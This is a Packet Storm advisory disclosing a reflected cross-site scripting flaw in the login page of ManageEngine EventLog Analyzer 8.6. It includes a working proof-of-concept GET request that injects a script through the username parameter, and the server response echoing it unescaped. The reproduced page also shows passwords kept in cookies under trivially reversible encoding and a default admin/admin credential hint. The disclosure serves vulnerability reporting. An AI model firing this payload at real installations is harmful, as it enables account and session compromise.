ManageEngine EventLog Analyzer 8.6 Cross Site Scripting

2014-01-17T00:00:00
ID PACKETSTORM:124821
Type packetstorm
Reporter Asheesh Kumar Mani Tripathi
Modified 2014-01-17T00:00:00

Description

                                        
                                            `================================================================================================================================================================  
  
ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability  
================================================================================================================================================================  
  
  
#Date- 12/12/2013  
  
# code by Asheesh kumar Mani Tripathi  
  
  
  
# Credit by Asheesh Anaconda  
  
  
  
#Vulnerbility  
ManageEngine EventLog Analyzer 8.6 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly   
sanitize user-supplied input   
  
#Impact  
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities   
  
  
========================================================================================================================  
  
Request  
========================================================================================================================  
  
  
GET /event/j_security_check?forChecking=null&j_username=aad307"><script>alert(1)</script>509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1  
Host: 172.28.154.78:8400  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://172.28.154.78:8400/event/index3.do  
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B  
Connection: keep-alive  
  
  
========================================================================================================================  
  
Response   
========================================================================================================================  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
isLoginPage: true  
Content-Type: text/html;charset=UTF-8  
Vary: Accept-Encoding  
Date: Tue, 17 Dec 2013 19:36:08 GMT  
Content-Length: 17880  
  
  
  
<link href="styles/newTheme.css" rel="stylesheet" type="text/css" />  
<!-- link href="styles/calendar.css" rel="stylesheet" type="text/css"-->  
<script type="text/javascript" language="JavaScript" src="javascript/sacommon.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-1.3.2.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-utils.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery.cookie.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-ui.js" ></script>  
<script type="text/javascript" language="JavaScript" src="javascript/elascript.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/setLayerPosition.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/LAUtils.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/json2.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jstorage.js"></script>  
  
  
  
  
  
<!DOCTYPE html>   
<html>  
<head>  
  
<title>ManageEngine EventLog Analyzer 8</title>  
<LINK REL="SHORTCUT ICON" HREF="images/favicon.ico">  
<script>  
  
  
function userType(ADAuthEnabled)  
{  
if(ADAuthEnabled == 'true')  
{  
//document.getElementById('loginOption').style.display='';  
document.getElementById('domainLists').style.visibility="visible";  
document.getElementById('selectdomiain').style.visibility="visible";  
} else {  
document.loginForm.domain.disabled=true;  
}  
//loadLogin();  
var id = document.getElementById("loginFirst");  
  
  
eval("id.style.visibility = 'visible';");  
  
  
}  
  
var xmlHttp;  
  
function clearLoginInfo()  
{  
xmlHttp=GetXmlHttpObject()  
if (xmlHttp==null)  
{  
alert ("Browser does not support HTTP Request")  
return  
}   
var url="login.do?requestid=false"//No I18N  
url=url+"&sid="+Math.random()//No I18N  
xmlHttp.onreadystatechange=processReqChange   
xmlHttp.open("GET",url,true)  
xmlHttp.send(null)  
}   
  
function processReqChange()   
{  
// only if xmlHttp shows "complete"  
if (xmlHttp.readyState == 4)   
{  
// only if "OK"  
if (xmlHttp.status == 200)   
{  
var value = xmlHttp.responseText;  
var id = document.getElementById("loginFirst");  
eval("id.style.visibility = 'hidden';");  
}   
else   
{  
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N  
}  
}  
}   
  
function dynamicprocessReqChange()   
{  
// only if xmlHttp shows "complete"  
if (xmlHttp.readyState == 4)   
{  
// only if "OK"  
if (xmlHttp.status == 200)   
{  
var value = xmlHttp.responseText;  
if(value != null){  
populatedomains(value);  
  
}  
}   
else   
{  
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N  
}  
}  
}  
  
function populatedomains(domainslist)  
{  
var domainsforthisuser = domainslist.split(",");  
var numberofdomains = domainsforthisuser.length;  
document.loginForm.domains.options.length = 0;  
for(var i=0;i<numberofdomains;i++)  
{  
document.forms["loginForm"].domains.options[i] =new Option(domainsforthisuser[i],domainsforthisuser[i]);  
}  
authenticationType();  
}  
  
  
function GetXmlHttpObject()  
{   
var objXMLHttp=null  
if (window.XMLHttpRequest) //For browser compatibility - Mozilla,FF  
{  
objXMLHttp=new XMLHttpRequest()  
}  
else if (window.ActiveXObject) //For browser compatibility - IE  
{  
objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")  
}  
return objXMLHttp  
}  
  
function dynamicDomains(usernameObject )  
{  
var username = usernameObject.value;  
xmlHttp=GetXmlHttpObject()  
if (xmlHttp==null)  
{  
alert ("Browser does not support HTTP Request")  
return  
}   
var url="/domainAuth?username="+username//No I18N  
xmlHttp.onreadystatechange=dynamicprocessReqChange   
xmlHttp.open("GET",url,true)  
xmlHttp.send(null);  
}  
  
function loadLogin()  
{  
//alert("loadLogin()")  
document.loginForm.j_username.value="";  
//document.login.j_username.focus();   
init = (document.cookie).indexOf("username");   
if(init != -1 )  
{  
//alert("inside getCookie.init");  
userlen = "username".length; //No I18N  
beginIndex = ((document.cookie).indexOf("username")+userlen);   
endIndex = (document.cookie).indexOf(";",beginIndex);  
if(endIndex == -1)  
{  
endIndex = (document.cookie).length;  
}  
username=(document.cookie).substring(beginIndex+1,endIndex);  
//alert("user:"+username);  
  
startIndex = ((document.cookie).indexOf("password")+"password".length);//No I18N  
endInd = (document.cookie).indexOf(";",startIndex);   
if(endInd == -1)  
{  
endInd=(document.cookie).length;  
}  
//Decrypting encrypted password..  
var encPassword=(document.cookie).substring(startIndex+1,endInd);  
password = decryptPassword(encPassword);  
//alert(password);  
  
var ssoStart = ((document.cookie).indexOf("singlesignon")+"singlesignon".length);//No I18N  
var ssoEnd = (document.cookie).indexOf(";",ssoStart);  
if(ssoEnd == -1)  
{  
ssoEnd=(document.cookie).length;  
}  
var singlesignon = (document.cookie).substring(ssoStart+1,ssoEnd);  
//alert(singlesignon);  
  
document.loginForm.j_username.value=username;  
document.loginForm.j_password.value=password;  
document.loginForm.checkbox.checked=false;  
  
//alert(username + password+singlesignon);  
if(singlesignon=="true" && username!="" && password!="")  
{  
//alert('1');  
document.loginForm.checkbox.checked=true;  
//debugger;  
if(document.loginForm.forChecking.value!="Invalid loginName/password")  
{  
document.loginForm.forChecking.value="";  
if ("null" == 'null')  
{   
document.loginForm.submit();  
}  
}  
else  
{  
document.loginForm.j_username.value="";  
document.loginForm.j_password.value="";  
document.loginForm.checkbox.checked=false;   
document.loginForm.j_username.focus();  
}  
}  
  
}  
else  
{  
//alert('0');   
document.loginForm.j_username.focus();  
}  
}  
  
function encryptPassword(textPassword)   
{  
var num_out = "";  
var str_in = escape(textPassword);  
for(i = 0; i < str_in.length; i++)   
{  
num_out += str_in.charCodeAt(i) - 23;  
}  
return num_out;   
}  
  
function decryptPassword(encPassword)   
{  
var str_out = "";  
var num_out = encPassword;   
for(i = 0; i < num_out.length; i += 2)   
{  
num_in = parseInt(num_out.substr(i,[2])) + 23;  
num_in = unescape('%' + num_in.toString(16));  
str_out += num_in;  
}  
var textPassword = unescape(str_out);  
return textPassword ;  
}  
function authenticationType()  
{  
var seldomain = document.loginForm.domains.value;  
  
if(seldomain.trim() == 'Local Authentication' || seldomain.trim() == 'Choose')   
{  
  
if(seldomain.trim() == 'Choose' && jQuery('#domainLists').css('visibility') == 'visible'){   
  
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N  
  
document.loginForm.domainName.disabled=false;  
  
document.loginForm.domainName.value=seldomain;  
  
document.loginForm.domain.disabled=false;  
  
document.loginForm.domain.value=seldomain;  
}  
else  
{  
  
document.loginForm.domain.disabled=true;  
document.loginForm.AUTHRULE_NAME.disabled=true; //No I18N  
document.loginForm.domainName.disabled=true;  
}  
}  
else if(seldomain=='radius')   
{  
document.loginForm.AUTHRULE_NAME.value='RadiusAuthenticator'; //No I18N  
document.loginForm.domain.disabled=false;  
document.loginForm.domain.value=seldomain;  
}  
else  
{  
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N  
document.loginForm.domainName.disabled=false;  
document.loginForm.domainName.value=seldomain;  
document.loginForm.domain.disabled=false;  
document.loginForm.domain.value=seldomain;   
}  
  
  
}  
function loginOptions()  
{  
var optionValue = document.loginForm.optionValue.value;  
  
if(optionValue == 'show')  
{  
document.getElementById('domainLists').style.visibility='visible';  
document.getElementById('selectdomiain').style.visibility='visible';  
//document.getElementById('loginOption').innerHTML="<a title='Hide' href='javascript:loginOptions()'>Options <<</a>";  
document.loginForm.optionValue.value='hide';//No I18N  
}  
else  
{  
document.getElementById('domainLists').style.visibility='hidden';  
document.getElementById('selectdomiain').style.visibility='hidden';  
//document.getElementById('loginOption').innerHTML="<a title='Show' href='javascript:loginOptions()'>Options >></a>";  
document.loginForm.optionValue.value='show';//No I18N  
}  
}  
  
jQuery(document).ready(function() {  
  
var isIE = jQuery.browser.msie;  
if(isIE)  
{  
jQuery('.placeholderUsername').show();  
jQuery('.placeholderPassword').show();  
  
jQuery('#username').keypress(function(){  
if(jQuery(this).val() == '' || jQuery(this).val() == 'Password')  
{  
jQuery('.placeholderPassword').hide();  
jQuery('.placeholderUsername').hide();  
  
}  
});  
jQuery('#username').click(function(){  
jQuery('.placeholderUsername').hide();  
jQuery('.placeholderPassword').hide();  
});  
jQuery('#username').focus(function(){  
jQuery('.placeholderUsername').hide();  
});  
jQuery('#password').focus(function(){  
jQuery('.placeholderPassword').hide();  
});   
jQuery('.placeholderUsername').click(function(){  
jQuery(this).hide();  
jQuery('#username').focus();  
});  
jQuery('.placeholderPassword').click(function(){  
jQuery(this).hide();  
jQuery('#password').focus();  
});  
jQuery('#username').blur(function(){  
if(jQuery(this).val() == '')  
{  
jQuery('.placeholderUsername').show();  
}  
if(jQuery('#password').val() == '')  
{  
jQuery('.placeholderPassword').show();  
}  
else  
{  
jQuery('.placeholderPassword').hide();  
}  
});  
jQuery('#password').blur(function(){  
if(jQuery(this).val() == '')  
{  
jQuery('.placeholderPassword').show();  
}  
if(jQuery('#username').val() == '')  
{  
jQuery('.placeholderUsername').show();  
}  
  
});   
}  
  
});  
  
  
</script>  
</head>  
  
  
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="userType('false');" style="background-color:#FFF" scroll="yes" >  
<script language="JavaScript" type="text/JavaScript">  
function check()  
{  
x = document.loginForm  
if (x.j_username.value == "" || x.j_username.value =="User Name")  
{  
document.getElementById('message').innerHTML ='Please enter a User Name';  
return false;  
}  
  
if ( x.j_password.value == "" || x.j_password.value =="Password")  
{  
document.getElementById('message').innerHTML ='Please enter password';  
return false;  
}  
//Convert the username to lowercase to overcome the login issue in mickey  
x.j_username.value=x.j_username.value.toLowerCase();  
  
  
// this is for 'Keep me signed on'  
var expDate = new Date();  
var thisCookie;   
if(x.checkbox.checked)  
{   
expDate.setTime(expDate.getTime()+(24*60*60*1000*365));  
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());  
//Encrypting the password for Cookie  
var textPassword = x.j_password.value ;  
var encPassword = encryptPassword(textPassword);  
document.cookie="password= "+ encPassword +";expires= "+((expDate).toGMTString());  
var sso = "true";  
document.cookie="singlesignon= "+ sso +";expires= "+((expDate).toGMTString());  
//alert("cookie:"+document.cookie);  
//console.debug("cockie="+document.cookie);  
}  
else  
{   
expDate.setTime(expDate.getTime());  
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());   
document.cookie="password= "+x.j_password.value+";expires= "+((expDate).toGMTString());  
document.cookie="singlesignon= 'false';expires= "+((expDate).toGMTString());  
//alert("else cookie:"+document.cookie);  
  
}  
  
}  
  
  
  
  
  
</script>  
<form name="loginForm" action="j_security_check" method="post" onSubmit="return check()" >  
  
<input type="hidden" name="AUTHRULE_NAME" value="Authenticator">  
  
<input type="hidden" name="domainName" disabled value="Local">  
  
<div id="loginmain">  
  
<div id="login">  
<div class="loginmessage">  
<h1>Sign In here</h1>  
<div id="message" class="error2"></div>  
  
  
<input type="hidden" name="forChecking" value="No such account configured for the user [aad307"><script>alert(1)</script>509283f38eba1c193]">  
  
<SCRIPT LANGUAGE="javascript" type="text/javascript">  
document.getElementById('message').innerHTML ='Invalid loginname / password';  
  
</SCRIPT>  
  
  
  
  
</div>   
<div class="loginbox">  
<div class="login_input1"> <span class="usericon"> </span>  
<div class="placeholderUsername">User Name</div>  
<input type="text" tabindex="10" name="j_username" id="username" onchange='dynamicDomains(this)' class="txtbox2" placeholder="User Name" />  
  
</div>  
<div class="login_input"> <span class="passicon"> </span>  
<div class="placeholderPassword">Password</div>  
<input type="password" tabindex="20" name="j_password" id="password" class="txtbox2" placeholder="Password" />  
  
  
</div>  
</div>   
  
<div id="selectdomiain" style="visibility:hidden">   
<div id="domainLists" style="visibility:hidden">   
  
<select name="domains" onChange='authenticationType()'>  
<option value="Choose">-- Choose --</option>  
  
<option value="Local Authentication">Local Authentication</option>  
</select>  
<input name="domain" type="hidden" value="">  
</div></div>  
  
<div class="btn">  
  
<div class="remember">  
<input type="checkbox" name="checkbox" id="checkbox" />  
<label class="txt">Keep me signed in</label>  
</div>  
<div class="login_bnt">   
<input name="loginButton" type="submit" style="width:80" class="loginbtn" value="Login" onclick="authenticationType()">  
<input name="optionValue" type="hidden" value="hide">  
</div>  
</div>  
<div id="loginFirst" class="alignC" style="top:300px; position:absolute;width:400px;">  
<span id="firstTimeInfo" class="firstTimeMgs">First time users use '<b>admin</b>' / '<b>admin</b>' to login   <a title="Do not show login details again" onclick="clearLoginInfo()" href="javascript:void(0);">X</a> </span>   
</div>  
</div>   
  
<div id="login_log">  
<div id="logobg">  
<div id="logo"><img src="images/eventlog_login_logo.png" alt="EventLog Analyzer" /></div>  
<div class="loginCaption">Unlock the Real Value of your Machine Generated Logs</div>  
</div>  
</div>  
  
</div>  
<div id="copyright">The <a href="http://www.eventloganalyzer.com" target="_blank">SIEM software</a> from <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ManageEngine </a> © 2013 <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ZOHO Corp.</a> All Rights Reserved </div>  
  
  
  
  
  
  
  
<script>  
loadLogin();  
</script>  
  
  
</form>  
  
<map name="Map">  
<area shape="rect" coords="2,2,141,37" href="http://www.netflowanalyzer.com" target="_blank" title="http://www.netflowanalyzer.com">  
<area shape="rect" coords="149,3,289,38" href="http://www.desktopcentral.com" target="_blank" title="http://www.desktopcentral.com">  
<area shape="rect" coords="296,3,437,38" href="http://www.fwanalyzer.com" target="_blank" title="http://www.fwanalyzer.com">  
<area shape="rect" coords="442,2,582,36" href="http://www.opmanager.com" target="_blank" title="http://www.opmanager.com">  
<area shape="rect" coords="589,2,736,36" href="http://www.wifimanager.com" target="_blank" title="http://www.wifimanager.com">  
<area shape="rect" coords="460,42,515,54" href="https://store.manageengine.com" target="_blank" title="https://store.manageengine.com">  
</map>  
</body>  
  
</html>  
  
  
<script language="JavaScript">  
function getieversion()  
{  
var ua = window.navigator.userAgent  
var msie = ua.indexOf ( "MSIE " )  
if ( msie > 0 ) {return parseInt ( ua.substring ( msie+5, ua.indexOf ( ".", msie ) ) );}  
else {return 6 ;} //tmp kludge to resolve other browsers  
}  
</script>  
  
<script>  
  
if(getieversion()<=5 )  
{  
document.loginForm.j_username.disabled = true;  
document.loginForm.j_password.disabled = true;  
document.loginForm.loginButton.disabled = true;  
  
document.loginForm.j_username.className = "txtboxDisabled";  
document.loginForm.j_password.className = "txtboxDisabled";  
document.loginForm.loginButton.className= "txtboxDisabled";  
alert("Sorry, we do not Support your Internet Explorer version "+getieversion()+" !!!");//No I18N  
}  
  
var AcceptsCookiesCheck = false;  
  
if(eval("document.cookie"))  
{  
if(document.cookie == '')  
{  
document.cookie = 'AcceptsCookiesCheck=yes';  
if(document.cookie.indexOf('AcceptsCookiesCheck=yes') != -1)  
{  
AcceptsCookiesCheck = true;  
}  
else  
{   
alert("Web Browser should have both Javascript and Cookies enabled!");  
}  
}  
}  
jQuery.cookie("panelState","expanded");//No I18N  
jQuery.cookie("calselection","custom");//No I18N  
jQuery.cookie("tooltipDiv","block");//No I18N  
//added for search - Pravin  
jQuery(document).ready(function()  
{  
//this will remove all the keys which were saved by storage ...  
jQuery.jStorage.flush();   
});  
</script>  
  
`